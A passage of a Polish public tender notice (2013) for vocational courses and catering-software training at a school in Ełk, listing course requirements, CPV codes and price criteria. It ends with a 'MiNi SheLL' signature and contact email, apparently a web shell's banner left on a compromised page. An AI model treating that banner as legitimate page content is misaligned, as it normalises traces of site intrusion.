c)	Wykonawca w ramach realizacji zamówienia zobowiązany jest do przeprowadzenia na zakończenie kursu egzaminu wewnętrznego dla grupy kończącej kurs,
d)	Wykonawca zobowiązany jest zapewnić uczestnikom kursu materiały szkoleniowe, które staną się własnością kursantów,
e)	Wykonawca musi posiadać uprawnienia, zapewnić kadrę dydaktyczna posiadającą kwalifikacje i doświadczenie zawodowe odpowiednie do prowadzonego kursu oraz zapewnić materiały i sprzęt niezbędne do należytego przeprowadzenia kursu. 
f)	Wykonawca zobowiązany jest prowadzić szczegółową dokumentację prowadzonych zajęć, w tym dzienniki zajęć zawierające w szczególności: listy obecności, wymiar godzin i tematy edukacyjne, rejestry wydanych zaświadczeń potwierdzających ukończenie kursu, oraz sporządzi arkusze przebiegu egzaminu wewnętrznego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Aktualne trendy w dekorowaniu ciast, ciastek oraz tortów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część VII - kurs aktualne trendy w dekorowaniu ciast, ciastek oraz tortów (30 godzin) - 14 uczniów + 2 nauczycieli,
a)	Program szkolenia przedstawiony Zamawiającemu wraz z ofertą powinien obejmować:
- zajęcia teoretyczne - max. 10 % kursu
- zajęcia praktyczne - min.  90 % 
b)	Szkolenie musi być przeprowadzone na terenie Zespołu Szkół nr 6 w Ełku w podanym terminie od stycznia do czerwca 2013,
c)	Wykonawca w ramach realizacji zamówienia zobowiązany jest do przeprowadzenia na zakończenie kursu egzaminu wewnętrznego dla grupy kończącej kurs,
d)	Wykonawca zobowiązany jest zapewnić uczestnikom kursu materiały szkoleniowe, które staną się własnością kursantów,
e)	Wykonawca musi posiadać uprawnienia, zapewnić kadrę dydaktyczna posiadającą kwalifikacje i doświadczenie zawodowe odpowiednie do prowadzonego kursu oraz zapewnić produkty, materiały i sprzęt niezbędne do należytego przeprowadzenia kursu. 
f)	Wykonawca zobowiązany jest prowadzić szczegółową dokumentację prowadzonych zajęć, w tym dzienniki zajęć zawierające w szczególności: listy obecności, wymiar godzin i tematy edukacyjne, rejestry wydanych zaświadczeń potwierdzających ukończenie kursu, oraz sporządzi arkusze przebiegu egzaminu wewnętrznego. 
g)	Program kursu musi obejmować minimum: 
- dekoracje z czekolady
- dekoracje z karmelu,
- sporządzanie tortów okolicznościowych z wykorzystaniem m.in. mas cukrowych,
- dekorowanie tortów w stylu angielskim,
- dekorację małych ciastek bankietowych.
h) Zajęcia prowadzone systemem modułowym tzn. wiedza teoretyczna połączona z zajęciami praktycznymi..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Kurs kelnerski.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część VIII - kurs kelnerski (30 godzin) - 14 uczniów + 2 nauczycieli,
a)	Program szkolenia przedstawiony Zamawiającemu wraz z ofertą powinien obejmować:
- zajęcia teoretyczne - max. 30 % kursu
- zajęcia praktyczne - min. 70 % 
b)	Szkolenie musi być przeprowadzone na terenie Zespołu Szkół nr 6 w Ełku w podanym terminie od stycznia do czerwca 2013,
c)	Wykonawca w ramach realizacji zamówienia zobowiązany jest do przeprowadzenia na zakończenie kursu egzaminu wewnętrznego dla grupy kończącej kurs,
d)	Wykonawca zobowiązany jest zapewnić uczestnikom kursu materiały szkoleniowe, które staną się własnością kursantów,
e)	Wykonawca musi posiadać uprawnienia, zapewnić kadrę dydaktyczna posiadającą kwalifikacje i doświadczenie zawodowe odpowiednie do prowadzonego kursu oraz zapewnić produkty, materiały i sprzęt niezbędne do należytego przeprowadzenia kursu. 
f)	Wykonawca zobowiązany jest prowadzić szczegółową dokumentację prowadzonych zajęć, w tym dzienniki zajęć zawierające w szczególności: listy obecności, wymiar godzin i tematy edukacyjne, rejestry wydanych zaświadczeń potwierdzających ukończenie kursu, oraz sporządzi arkusze przebiegu egzaminu wewnętrznego. 
g)	Wykonawca musi być członkiem lub posiadać rekomendację Krajowego Stowarzyszenia Kelnerów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Wdrożenie oprogramowania komputerowego branzowego w pracowni komputerowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część IX - wdrożenie oprogramowania komputerowego branżowego w pracowni komputerowej - w tym szkolenie 16 n-li (8 godzin) przedmiotów zawodowych. 
a)	Program szkolenia przedstawiony Zamawiającemu wraz z ofertą powinien obejmować:
- zajęcia teoretyczne - max. 10 % kursu
- zajęcia praktyczne - min. 90 % 
Wykonawca przeprowadzi szkolenie nauczycieli i wdroży programy: GASTROSZEF, SOHO , GASTRO POS, w tym zakup 3 licencji (po 1 z każdego wymienionego programu), w wersji edukacyjnej, z wykorzystaniem udostępnionych celem przeprowadzenia kursu 15 stanowiskach komputerowych.
b)	Szkolenie musi być przeprowadzone na terenie Zespołu Szkół nr 6 w Ełku w podanym terminie od stycznia  do czerwca 2013,
c)	Wykonawca w ramach realizacji zamówienia zobowiązany jest do przeprowadzenia na zakończenie kursu egzaminu wewnętrznego dla grupy kończącej kurs,
d)	Wykonawca zobowiązany jest zapewnić uczestnikom kursu materiały szkoleniowe, które staną się własnością kursantów,
e)	Wykonawca musi posiadać uprawnienia, zapewnić kadrę dydaktyczna posiadającą kwalifikacje i doświadczenie zawodowe odpowiednie do prowadzonego kursu oraz zapewnić materiały niezbędne do należytego przeprowadzenia kursu. Zamawiający udostępni 15 stanowisk komputerowych celem przeprowadzenia kursu
f)	Wykonawca zobowiązany jest prowadzić szczegółową dokumentację prowadzonych zajęć, w tym dzienniki zajęć zawierające w szczególności: listy obecności, wymiar godzin i tematy edukacyjne, rejestry wydanych zaświadczeń potwierdzających ukończenie kursu, oraz sporządzi arkusze przebiegu egzaminu wewnętrznego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com